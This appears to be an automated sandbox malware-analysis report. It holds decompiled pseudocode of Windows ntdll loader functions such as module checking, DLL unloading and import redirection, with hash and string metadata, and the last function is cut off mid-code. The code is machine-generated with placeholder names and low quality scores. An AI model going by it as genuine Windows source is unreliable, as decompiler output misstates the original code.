                                                                            				signed char _t101;
                                                                            				intOrPtr _t104;
                                                                            				void* _t108;
                                                                            				void* _t111;
                                                                            				signed int _t113;
                                                                            				intOrPtr* _t117;
                                                                            				signed int _t119;
                                                                            				intOrPtr* _t120;
                                                                            				signed int _t121;
                                                                            				intOrPtr* _t122;
                                                                            				signed int _t126;
                                                                            				void* _t130;
                                                                            				void* _t131;
                                                                            				signed int _t132;
                                                                            				signed int _t134;
                                                                            				signed int _t135;
                                                                            				intOrPtr _t136;
                                                                            				signed int _t137;
                                                                            				signed int _t138;
                                                                            				void* _t139;
                                                                            				void* _t140;
                                                                            				void* _t141;
                                                                            
                                                                            				_t134 = 0;
                                                                            				_t108 = __ecx;
                                                                            				_v12 = 0;
                                                                            				_v20 = 0;
                                                                            				_t141 =  *0x1d8c68d8 - _t134; // 0x0
                                                                            				if(_t141 != 0) {
                                                                            					_v20 = 1;
                                                                            				}
                                                                            				if( *0x1d8c65f9 == 0) {
                                                                            					_t136 =  *((intOrPtr*)(_t108 + 4));
                                                                            					while(1) {
                                                                            						__eflags = _t136 - _t108;
                                                                            						if(_t136 == _t108) {
                                                                            							break;
                                                                            						}
                                                                            						_t110 = _t136 - 0x54;
                                                                            						E1D807550(_t136 - 0x54);
                                                                            						_t136 =  *((intOrPtr*)(_t136 + 4));
                                                                            					}
                                                                            					goto L2;
                                                                            				} else {
                                                                            					L2:
                                                                            					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                                                                            					E1D7DFED0(0x1d8c32d8);
                                                                            					if( *0x1d8c65f0 != 0) {
                                                                            						_t126 =  *0x7ffe0330;
                                                                            						_t135 =  *0x1d8c9218; // 0x0
                                                                            						_t111 = 0x20;
                                                                            						_t110 = _t111 - (_t126 & 0x0000001f);
                                                                            						asm("ror edi, cl");
                                                                            						_t134 = _t135 ^ _t126;
                                                                            					}
                                                                            					_t137 = 0;
                                                                            					_t67 =  *((intOrPtr*)(_t108 + 4));
                                                                            					_v36 = 0;
                                                                            					_v32 = _t67;
                                                                            					if(_t67 == _t108) {
                                                                            						L11:
                                                                            						_push(0x1d8c32d8);
                                                                            						E1D7DE740(_t110);
                                                                            						return _t137;
                                                                            					} else {
                                                                            						_t113 = _v16 & 0x00000100;
                                                                            						_v16 = _t113;
                                                                            						do {
                                                                            							_t138 = _t67 - 0x54;
                                                                            							if(_t113 != 0) {
                                                                            								_t110 = _t138;
                                                                            								_t70 = E1D7C6DA6(_t138);
                                                                            								_v36 = _t70;
                                                                            								__eflags = _t70;
                                                                            								if(_t70 < 0) {
                                                                            									break;
                                                                            								}
                                                                            							}
                                                                            							_t114 = _t138;
                                                                            							E1D7D98DE(_t138, 0);
                                                                            							if(_t134 != 0) {
                                                                            								__eflags =  *0x1d8c65f8;
                                                                            								if(__eflags == 0) {
                                                                            									_t114 = _t134;
                                                                            									 *0x1d8c91e0(_t138);
                                                                            									 *_t134();
                                                                            									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
                                                                            								}
                                                                            							}
                                                                            							_t148 = _v20;
                                                                            							if(_v20 == 0) {
                                                                            								_t76 =  *(_t138 + 0x28);
                                                                            								_t114 = _t76;
                                                                            								_t130 = 0x10;
                                                                            								_v8 = _t76;
                                                                            								if(E1D7F1C7D(_t76, _t130, _t148) != 0) {
                                                                            									_t117 = _v8;
                                                                            									_t31 = _t117 + 2; // 0x2
                                                                            									_t131 = _t31;
                                                                            									do {
                                                                            										_t78 =  *_t117;
                                                                            										_t117 = _t117 + 2;
                                                                            										__eflags = _t78 - _v12;
                                                                            									} while (_t78 != _v12);
                                                                            									_t114 = _t117 - _t131 >> 1;
                                                                            									__eflags =  *0x1d8c68d8;
                                                                            									if( *0x1d8c68d8 == 0) {
                                                                            										_t33 = _t114 + 2; // 0x0
                                                                            										_t79 = _t33;
                                                                            									} else {
                                                                            										_t104 =  *0x1d8c5d4c; // 0x0
                                                                            										_t79 = _t104 + 1 + _t114;
                                                                            									}
                                                                            									_v28 = _t79;
                                                                            									_t132 = E1D7E5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
                                                                            									_v24 = _t132;
                                                                            									__eflags = _t132;
                                                                            									if(_t132 != 0) {
                                                                            										_t119 =  *0x1d8c68d8; // 0x0
                                                                            										__eflags = _t119;
                                                                            										if(_t119 == 0) {
                                                                            											_t120 = _v8;
                                                                            											_t52 = _t120 + 2; // 0x2
                                                                            											_v40 = _t52;
                                                                            											do {
                                                                            												_t84 =  *_t120;
                                                                            												_t120 = _t120 + 2;
                                                                            												__eflags = _t84 - _v12;
                                                                            											} while (_t84 != _v12);
                                                                            											_t121 = _t120 - _v40;
                                                                            											__eflags = _t121;
                                                                            											_t114 = _t121 >> 1;
                                                                            											E1D8188C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
                                                                            											_t139 = _t139 + 0xc;
                                                                            											L39:
                                                                            											 *0x1d8c68d8 = _v24;
                                                                            											 *0x1d8c5d4c = _v28;
                                                                            											goto L9;
                                                                            										}
                                                                            										_t89 =  *0x1d8c5d4c; // 0x0
                                                                            										_t90 = _t89 + _t89;
                                                                            										__eflags = _t90;
                                                                            										_v40 = _t90;
                                                                            										E1D8188C0(_t132, _t119, _t90);
                                                                            										_t133 = _v8;
                                                                            										_t140 = _t139 + 0xc;
                                                                            										_t122 = _v8;
                                                                            										_t43 = _t122 + 2; // 0x2
                                                                            										_v8 = _t43;
                                                                            										do {
                                                                            											_t93 =  *_t122;
                                                                            											_t122 = _t122 + 2;
                                                                            											__eflags = _t93 - _v12;
                                                                            										} while (_t93 != _v12);
                                                                            										_t114 = _v40 + 2;
                                                                            										E1D8188C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
                                                                            										_t139 = _t140 + 0xc;
                                                                            										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8c68d8);
                                                                            										goto L39;
                                                                            									} else {
                                                                            										_t101 =  *0x1d8c37c0; // 0x0
                                                                            										__eflags = _t101 & 0x00000003;
                                                                            										if((_t101 & 0x00000003) != 0) {
                                                                            											_push("Failed to allocated memory for shimmed module list\n");
                                                                            											__eflags = 0;
                                                                            											_push(0);
                                                                            											_push("LdrpCheckModule");
                                                                            											_push(0xaf4);
                                                                            											_push("minkernel\\ntdll\\ldrinit.c");
                                                                            											E1D84E692();
                                                                            											_t101 =  *0x1d8c37c0; // 0x0
                                                                            											_t139 = _t139 + 0x14;
                                                                            										}
                                                                            										__eflags = _t101 & 0x00000010;
                                                                            										if((_t101 & 0x00000010) != 0) {
                                                                            											asm("int3");
                                                                            										}
                                                                            										goto L9;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							L9:
                                                                            							E1D7F0C2C(_t138, 1, _t114);
                                                                            							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
                                                                            							E1D7EDF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
                                                                            							_t113 = _v16;
                                                                            							_t67 =  *((intOrPtr*)(_v32 + 4));
                                                                            							_v32 = _t67;
                                                                            						} while (_t67 != _t108);
                                                                            						_t137 = _v36;
                                                                            						goto L11;
                                                                            					}
                                                                            				}
                                                                            			}












































                                                                            APIs
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D839F2E
                                                                            • LdrpCheckModule, xrefs: 1D839F24
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 1D839F1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-161242083
                                                                            • Opcode ID: de5632758b34d1952b8144c04a4604dcd8c1196f740e94d9906d2c1c1d5b889b
                                                                            • Instruction ID: b4a187b8535144e3619b23e453847b5d26d38526ccb84193bc85989b4829f0ca
                                                                            • Opcode Fuzzy Hash: de5632758b34d1952b8144c04a4604dcd8c1196f740e94d9906d2c1c1d5b889b
                                                                            • Instruction Fuzzy Hash: 6871F074A00255DFCB15DF68CC85BFEB7F0FB48618F15806AE919A7360E334AA41CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 66%
                                                                            			E1D7F9723(signed int __ecx, void* __edx) {
                                                                            				char _v4;
                                                                            				intOrPtr* _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				intOrPtr _v20;
                                                                            				intOrPtr _v24;
                                                                            				intOrPtr* _v28;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				intOrPtr _t49;
                                                                            				signed int _t50;
                                                                            				signed int _t60;
                                                                            				signed int _t69;
                                                                            				signed int _t70;
                                                                            				intOrPtr _t79;
                                                                            				signed int _t82;
                                                                            				signed int _t83;
                                                                            				intOrPtr* _t85;
                                                                            				intOrPtr _t86;
                                                                            				signed int _t87;
                                                                            				void* _t88;
                                                                            				signed int _t89;
                                                                            				signed int _t93;
                                                                            				signed int _t99;
                                                                            				signed int* _t100;
                                                                            				void* _t102;
                                                                            				void* _t103;
                                                                            				signed int _t104;
                                                                            				intOrPtr* _t105;
                                                                            				void* _t107;
                                                                            				signed int _t108;
                                                                            				intOrPtr* _t110;
                                                                            				signed int _t112;
                                                                            				signed int _t113;
                                                                            				void* _t115;
                                                                            
                                                                            				_t87 = __ecx;
                                                                            				_t115 = (_t113 & 0xfffffff8) - 0x14;
                                                                            				_t110 = __ecx;
                                                                            				_v16 =  *[fs:0x30];
                                                                            				_t82 = 0;
                                                                            				_v12 = __ecx;
                                                                            				_push(_t103);
                                                                            				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
                                                                            					L9:
                                                                            					_t13 = _t110 + 0x20;
                                                                            					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
                                                                            					__eflags =  *_t13;
                                                                            					E1D7FA4E3(_t82, _t87, _t103, _t110,  *_t13);
                                                                            					L10:
                                                                            					__eflags =  *0x1d8c65f0 - _t82; // 0x0
                                                                            					if(__eflags != 0) {
                                                                            						_t99 =  *0x7ffe0330;
                                                                            						_t83 =  *0x1d8c9214; // 0x0
                                                                            						_t88 = 0x20;
                                                                            						_t87 = _t88 - (_t99 & 0x0000001f);
                                                                            						asm("ror ebx, cl");
                                                                            						_t82 = _t83 ^ _t99;
                                                                            					}
                                                                            					E1D7DFED0(0x1d8c32d8);
                                                                            					_t49 =  *_t110;
                                                                            					while(1) {
                                                                            						_v20 = _t49;
                                                                            						__eflags = _t49 - _t110;
                                                                            						if(_t49 == _t110) {
                                                                            							break;
                                                                            						}
                                                                            						_t16 = _t49 - 0x54; // 0x777236a0
                                                                            						_t108 = _t16;
                                                                            						__eflags =  *(_t108 + 0x34) & 0x00000008;
                                                                            						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
                                                                            							_push(_t87);
                                                                            							_t102 = 2;
                                                                            							E1D7F0C2C(_t108, _t102);
                                                                            							__eflags = _t82;
                                                                            							if(_t82 != 0) {
                                                                            								 *0x1d8c91e0(_t108);
                                                                            								 *_t82();
                                                                            							}
                                                                            							_t87 = _t108;
                                                                            							E1D7D98DE(_t87, 1);
                                                                            							_t79 = _v24;
                                                                            							__eflags =  *(_t79 + 0x68) & 0x00000100;
                                                                            							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
                                                                            								_t87 = _t108;
                                                                            								E1D8585AA(_t87);
                                                                            							}
                                                                            						}
                                                                            						__eflags =  *0x1d8c37c0 & 0x00000005;
                                                                            						if(__eflags != 0) {
                                                                            							_t43 = _t108 + 0x24; // -48
                                                                            							E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
                                                                            							_t115 = _t115 + 0x18;
                                                                            						}
                                                                            						_push(0);
                                                                            						_push( *((intOrPtr*)(_t108 + 0x18)));
                                                                            						E1D7FA390(_t82, _t87, _t108, _t110, __eflags);
                                                                            						_t49 =  *_v28;
                                                                            					}
                                                                            					_push(0x1d8c32d8);
                                                                            					_t50 = E1D7DE740(_t87);
                                                                            					while(1) {
                                                                            						L3:
                                                                            						_t89 =  *(_t110 + 0x18);
                                                                            						if(_t89 == 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t104 =  *_t89;
                                                                            						__eflags = _t104 - _t89;
                                                                            						if(_t104 != _t89) {
                                                                            							_t50 =  *_t104;
                                                                            							 *_t89 = _t50;
                                                                            						} else {
                                                                            							_t32 = _t110 + 0x18;
                                                                            							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
                                                                            							__eflags =  *_t32;
                                                                            						}
                                                                            						__eflags = _t104;
                                                                            						if(_t104 == 0) {
                                                                            							break;
                                                                            						} else {
                                                                            							L1D7E2330(_t50, 0x1d8c6668);
                                                                            							_t86 =  *((intOrPtr*)(_t104 + 4));
                                                                            							_t35 = _t104 + 8; // 0x8
                                                                            							_t100 = _t35;
                                                                            							_t93 =  *(_t86 + 0x1c);
                                                                            							_t60 =  *_t93;
                                                                            							_v16 = _t60;
                                                                            							__eflags = _t60 - _t100;
                                                                            							if(_t60 == _t100) {
                                                                            								L27:
                                                                            								 *_t93 =  *_t100;
                                                                            								__eflags =  *(_t86 + 0x1c) - _t100;
                                                                            								if(__eflags == 0) {
                                                                            									asm("sbb eax, eax");
                                                                            									_t69 =  ~(_t93 - _t100) & _t93;
                                                                            									__eflags = _t69;
                                                                            									 *(_t86 + 0x1c) = _t69;
                                                                            								}
                                                                            								_push( &_v4);
                                                                            								E1D7ED963(_t86, _t86, 0, _t104, _t110, __eflags);
                                                                            								E1D7E24D0(0x1d8c6668);
                                                                            								__eflags = _v12;
                                                                            								if(_v12 != 0) {
                                                                            									E1D7F9723(_t86, 0);
                                                                            								}
                                                                            								_t50 = E1D7E3BC0( *0x1d8c5d74, 0, _t104);
                                                                            								continue;
                                                                            							}
                                                                            							_t112 = _t60;
                                                                            							do {
                                                                            								_t70 =  *_t112;
                                                                            								_t93 = _t112;
                                                                            								_t112 = _t70;
                                                                            								__eflags = _t70 - _t100;
                                                                            							} while (_t70 != _t100);
                                                                            							_t110 = _v8;
                                                                            							goto L27;
                                                                            						}
                                                                            					}
                                                                            					_t105 =  *_t110;
                                                                            					 *(_t110 + 0x20) = 0xfffffffe;
                                                                            					if(_t105 == _t110) {
                                                                            						L8:
                                                                            						return _t50;
                                                                            					} else {
                                                                            						goto L5;
                                                                            					}
                                                                            					do {
                                                                            						L5:
                                                                            						_t85 =  *_t105;
                                                                            						_t107 = _t105 + 0xffffffac;
                                                                            						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
                                                                            						E1D7F9938(L1D7E2330(_t50, 0x1d8c6668), _t107);
                                                                            						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
                                                                            							_t28 = _t107 + 0x74; // -56
                                                                            							L1D7F9B40(_t85, _t107, _t110, 0x1d8c67ac);
                                                                            							_t29 = _t107 + 0x68; // -68
                                                                            							L1D7F9B40(_t85, _t107, _t110, 0x1d8c67a4);
                                                                            							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
                                                                            						}
                                                                            						E1D7E24D0(0x1d8c6668);
                                                                            						if( *0x1d8c5d70 != 0) {
                                                                            							E1D80680F(_t107);
                                                                            						}
                                                                            						_t50 = E1D7ED3E1(_t85, _t107, _t110);
                                                                            						_t105 = _t85;
                                                                            					} while (_t85 != _t110);
                                                                            					goto L8;
                                                                            				}
                                                                            				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
                                                                            					goto L10;
                                                                            				}
                                                                            				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
                                                                            					goto L9;
                                                                            				}
                                                                            				goto L3;
                                                                            			}
                                                                            0x1d7f98a7
                                                                            0x1d7f98a9
                                                                            0x1d7f98a9
                                                                            0x1d7f98ad
                                                                            0x00000000
                                                                            0x1d7f98ad
                                                                            0x1d7f987e
                                                                            0x1d7f9760
                                                                            0x1d7f9762
                                                                            0x1d7f976b
                                                                            0x1d7f97b5
                                                                            0x1d7f97bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f976d
                                                                            0x1d7f976d
                                                                            0x1d7f976d
                                                                            0x1d7f976f
                                                                            0x1d7f9777
                                                                            0x1d7f9782
                                                                            0x1d7f978b
                                                                            0x1d7f9849
                                                                            0x1d7f9852
                                                                            0x1d7f9857
                                                                            0x1d7f9860
                                                                            0x1d7f9865
                                                                            0x1d7f9865
                                                                            0x1d7f9796
                                                                            0x1d7f97a2
                                                                            0x1d83db13
                                                                            0x1d83db13
                                                                            0x1d7f97aa
                                                                            0x1d7f97af
                                                                            0x1d7f97b1
                                                                            0x00000000
                                                                            0x1d7f976d
                                                                            0x1d7f974d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f9753
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-2283098728
                                                                            • Opcode ID: 20e8a6dddca2474309d6db33fb79787666769ea76724ac88bf84bcb6d4736f00
                                                                            • Instruction ID: 07667a7daaa585ff4c737a0d98cfecfeb731155f081f056e1464e15ea825de39
                                                                            • Opcode Fuzzy Hash: 20e8a6dddca2474309d6db33fb79787666769ea76724ac88bf84bcb6d4736f00
                                                                            • Instruction Fuzzy Hash: EA51E235608742DFC721DF38D884B6D77A1BB88634F154A2EE5A6873A1D770E844CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 54%
                                                                            			E1D80C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
                                                                            				signed int _v20;
                                                                            				signed int _v36;
                                                                            				char _v544;
                                                                            				char _v552;
                                                                            				char _v556;
                                                                            				char* _v560;
                                                                            				short _v562;
                                                                            				signed int _v564;
                                                                            				short _v570;
                                                                            				char _v572;
                                                                            				signed int _v580;
                                                                            				char _v588;
                                                                            				signed int _v604;
                                                                            				signed short _v608;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				void* _t25;
                                                                            				signed int* _t27;
                                                                            				signed int _t39;
                                                                            				signed int _t42;
                                                                            				signed int _t54;
                                                                            				signed char _t56;
                                                                            				signed int* _t58;
                                                                            				intOrPtr* _t65;
                                                                            				signed int _t67;
                                                                            				void* _t70;
                                                                            				signed int _t72;
                                                                            				signed int _t75;
                                                                            				void* _t77;
                                                                            				signed int _t80;
                                                                            				void* _t82;
                                                                            				signed int _t85;
                                                                            				signed int _t87;
                                                                            
                                                                            				_t70 = __edx;
                                                                            				_push(__ebx);
                                                                            				_push(__edi);
                                                                            				_t72 = __ecx;
                                                                            				_t25 = E1D7F0130();
                                                                            				if(_t25 != 0) {
                                                                            					L1D7E2330(_t25, 0x1d8c5b5c);
                                                                            					_t27 =  *0x1d8c9224; // 0x0
                                                                            					_t75 =  *_t27;
                                                                            					__eflags = _t72;
                                                                            					if(_t72 != 0) {
                                                                            						__eflags = _t75;
                                                                            						if(_t75 == 0) {
                                                                            							goto L13;
                                                                            						} else {
                                                                            							_t80 = _t75 - 1;
                                                                            							goto L7;
                                                                            						}
                                                                            					} else {
                                                                            						__eflags = _t75;
                                                                            						if(_t75 == 0) {
                                                                            							E1D7C9050( *0x1d8c921c, _t75);
                                                                            						}
                                                                            						__eflags = _t75 - 0xffffffff;
                                                                            						if(_t75 == 0xffffffff) {
                                                                            							L13:
                                                                            							E1D7E24D0(0x1d8c5b5c);
                                                                            							_t65 = 0xe;
                                                                            							asm("int 0x29");
                                                                            							_t87 = (_t85 & 0xfffffff8) - 0x224;
                                                                            							_v20 =  *0x1d8cb370 ^ _t87;
                                                                            							_t76 = _t65;
                                                                            							 *0x1d8c91e0( &_v544, 0x104, _t75, _t82);
                                                                            							_t67 =  *_t65() + _t33;
                                                                            							__eflags = _t67;
                                                                            							if(_t67 != 0) {
                                                                            								__eflags =  *0x1d8c660c;
                                                                            								_v560 =  &_v552;
                                                                            								_v564 = _t67;
                                                                            								_v562 = 0x208;
                                                                            								if(__eflags == 0) {
                                                                            									L25:
                                                                            									_push( &_v556);
                                                                            									_push( &_v564);
                                                                            									E1D85CB20(0x1d8c5b5c, _t72, _t76, __eflags);
                                                                            									goto L15;
                                                                            								} else {
                                                                            									_t76 = ( *0x1d8c6608 & 0x0000ffff) + 2 + _t67;
                                                                            									_t42 = E1D7E5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
                                                                            									_v580 = _t42;
                                                                            									__eflags = _t42;
                                                                            									if(_t42 != 0) {
                                                                            										__eflags = 0;
                                                                            										_v570 = _t76;
                                                                            										_v572 = 0;
                                                                            										E1D7F10D0(_t67,  &_v572, 0x1d8c6608);
                                                                            										E1D7F10D0(_t67,  &_v580,  &_v572);
                                                                            										E1D7DFE40(_t67,  &_v588, ";");
                                                                            										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8c660c);
                                                                            										 *0x1d8c6608 = _v608;
                                                                            										_t54 = _v604;
                                                                            										 *0x1d8c660c = _t54;
                                                                            										 *0x1d8c6604 = _t54;
                                                                            										E1D85D4A0(_t67, __eflags);
                                                                            										goto L25;
                                                                            									} else {
                                                                            										_t56 =  *0x1d8c37c0; // 0x0
                                                                            										__eflags = _t56 & 0x00000003;
                                                                            										if((_t56 & 0x00000003) != 0) {
                                                                            											_push("Failed to reallocate the system dirs string !\n");
                                                                            											_push(0);
                                                                            											_push("LdrpInitializePerUserWindowsDirectory");
                                                                            											_push(0xcf4);
                                                                            											_push("minkernel\\ntdll\\ldrinit.c");
                                                                            											E1D84E692();
                                                                            											_t56 =  *0x1d8c37c0; // 0x0
                                                                            											_t87 = _t87 + 0x14;
                                                                            										}
                                                                            										__eflags = _t56 & 0x00000010;
                                                                            										if((_t56 & 0x00000010) != 0) {
                                                                            											asm("int3");
                                                                            										}
                                                                            										_t39 = 0xc0000017;
                                                                            									}
                                                                            								}
                                                                            							} else {
                                                                            								L15:
                                                                            								_t39 = 0;
                                                                            								__eflags = 0;
                                                                            							}
                                                                            							_pop(_t77);
                                                                            							__eflags = _v36 ^ _t87;
                                                                            							return E1D814B50(_t39, 0x1d8c5b5c, _v36 ^ _t87, _t70, _t72, _t77);
                                                                            						} else {
                                                                            							_t80 = _t75 + 1;
                                                                            							__eflags = _t80;
                                                                            							L7:
                                                                            							_t58 =  *0x1d8c9224; // 0x0
                                                                            							 *_t58 = _t80;
                                                                            							__eflags = _t72;
                                                                            							if(_t72 != 0) {
                                                                            								__eflags = _t80;
                                                                            								if(_t80 == 0) {
                                                                            									E1D7C9050( *0x1d8c921c, 1);
                                                                            								}
                                                                            							}
                                                                            							_t25 = E1D7E24D0(0x1d8c5b5c);
                                                                            							goto L1;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					L1:
                                                                            					return _t25;
                                                                            				}
                                                                            			}





































                                                                            APIs
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D8480F3
                                                                            • Failed to reallocate the system dirs string !, xrefs: 1D8480E2
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 1D8480E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1783798831
                                                                            • Opcode ID: 663683233297036e988a280e6e855f567f6d771b7fd8edfbc55491456c42d63c
                                                                            • Instruction ID: 3c961ecdc5159a04134588b052bc0ef1591645fd9e0b856b7a48e9c78192fc9a
                                                                            • Opcode Fuzzy Hash: 663683233297036e988a280e6e855f567f6d771b7fd8edfbc55491456c42d63c
                                                                            • Instruction Fuzzy Hash: AC41D375518315EBC721DF24EC85B9B77F8EF486A4F01492AF96897260EB34E800CB97
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 50%
                                                                            			E1D8543D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v16;
                                                                            				intOrPtr _v20;
                                                                            				char _v24;
                                                                            				intOrPtr _v28;
                                                                            				void* __ebx;
                                                                            				void* __esi;
                                                                            				signed char _t37;
                                                                            				signed int _t41;
                                                                            				intOrPtr _t44;
                                                                            				signed int _t49;
                                                                            				signed int _t50;
                                                                            				signed int _t51;
                                                                            				signed int _t52;
                                                                            				void* _t54;
                                                                            				signed int _t59;
                                                                            				signed int _t60;
                                                                            				signed int _t64;
                                                                            				signed int _t66;
                                                                            				intOrPtr _t68;
                                                                            				signed int _t69;
                                                                            				intOrPtr _t70;
                                                                            
                                                                            				_t68 = _a4;
                                                                            				_t54 = __edx;
                                                                            				_v28 = __ecx;
                                                                            				_v24 = E1D854B46(_t68);
                                                                            				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
                                                                            				_v8 =  *((intOrPtr*)(_t54 + 0x30));
                                                                            				_v20 =  *((intOrPtr*)(_t54 + 0x90));
                                                                            				_t37 =  *0x1d8c6714; // 0x0
                                                                            				_v16 = _t68;
                                                                            				_t69 =  *0x1d8c6710; // 0x0
                                                                            				if((_t37 & 0x00000001) != 0) {
                                                                            					if(_t69 == 0) {
                                                                            						_t69 = 0;
                                                                            						__eflags = 0;
                                                                            					} else {
                                                                            						_t69 = _t69 ^ 0x1d8c6710;
                                                                            					}
                                                                            				}
                                                                            				_t64 = _t37 & 1;
                                                                            				while(_t69 != 0) {
                                                                            					__eflags = E1D854528(_t54, _t69,  &_v24, _t69);
                                                                            					if(__eflags >= 0) {
                                                                            						if(__eflags <= 0) {
                                                                            							L25:
                                                                            							while(_t69 != 0) {
                                                                            								_t41 = E1D854528(_t54, _t69,  &_v24, _t69);
                                                                            								__eflags = _t41;
                                                                            								if(_t41 != 0) {
                                                                            									break;
                                                                            								}
                                                                            								_t66 =  *0x1d8c5ca0; // 0x0
                                                                            								__eflags = _t66;
                                                                            								if(_t66 == 0) {
                                                                            									L28:
                                                                            									__eflags =  *0x1d8c37c0 & 0x00000005;
                                                                            									_t70 =  *((intOrPtr*)(_t69 + 0x20));
                                                                            									if(( *0x1d8c37c0 & 0x00000005) != 0) {
                                                                            										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                            										_push( *((intOrPtr*)(_t44 + 0x2a8)));
                                                                            										_push( *((intOrPtr*)(_t44 + 0x2a4)));
                                                                            										_push(_a4);
                                                                            										_push( *((intOrPtr*)(_t54 + 0x30)));
                                                                            										_push( *((intOrPtr*)(_t54 + 0x2c)));
                                                                            										_push( *((intOrPtr*)(_v28 + 0x30)));
                                                                            										E1D84E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
                                                                            									}
                                                                            									L27:
                                                                            									return _t70;
                                                                            								}
                                                                            								 *0x1d8c91e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
                                                                            								_t49 =  *_t66();
                                                                            								__eflags = _t49;
                                                                            								if(_t49 != 0) {
                                                                            									goto L28;
                                                                            								}
                                                                            								_t50 =  *(_t69 + 4);
                                                                            								_t59 = _t69;
                                                                            								__eflags = _t50;
                                                                            								if(_t50 == 0) {
                                                                            									while(1) {
                                                                            										_t69 =  *(_t69 + 8) & 0xfffffffc;
                                                                            										__eflags = _t69;
                                                                            										if(_t69 == 0) {
                                                                            											goto L25;
                                                                            										}
                                                                            										__eflags =  *_t69 - _t59;
                                                                            										if( *_t69 == _t59) {
                                                                            											goto L25;
                                                                            										}
                                                                            										_t59 = _t69;
                                                                            									}
                                                                            									continue;
                                                                            								}
                                                                            								_t69 = _t50;
                                                                            								_t60 =  *_t69;
